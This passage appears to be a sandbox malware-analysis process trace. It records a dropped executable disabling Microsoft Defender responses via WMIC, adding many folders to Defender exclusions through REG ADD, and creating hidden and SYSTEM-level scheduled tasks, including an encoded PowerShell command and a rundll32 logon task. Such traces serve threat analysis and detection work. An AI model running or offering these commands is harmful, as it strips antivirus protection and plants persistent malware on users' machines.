/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:920

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1756

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1968

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1068

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1060

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:524

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1032

C:\Windows\system32\taskeng.exe
taskeng.exe {1868657D-CA8C-4742-8872-F901579D6EF1} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\YlqWVPE.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\YlqWVPE.exe nv /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1704

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1788

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1312

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1688

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1716

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:860

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:944

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:668

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gqbYtLPFA" /SC once /ST 04:43:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1976

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gqbYtLPFA"
3⤵
PID:1412

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gqbYtLPFA"
3⤵
PID:1844

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:288

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:820

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:956

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:984

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1120

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\rUaCEWwDdnKMYjxw\xkDkIJIa\GGCieCORSyUlCvCL.wsf"
3⤵
PID:1116

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\rUaCEWwDdnKMYjxw\xkDkIJIa\GGCieCORSyUlCvCL.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:860

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1916

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:900

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1964

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 03:19:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\oBRwDtw.exe\" gh /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:288

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
3⤵
PID:1712

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\oBRwDtw.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\oBRwDtw.exe gh /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:612

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1032

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1704

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1300

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1516

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1344

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1716

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1552

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1572

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
3⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1904

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1540

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\LVSTAD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1712

C:\Windows\SysWOW64\schtasks.exe
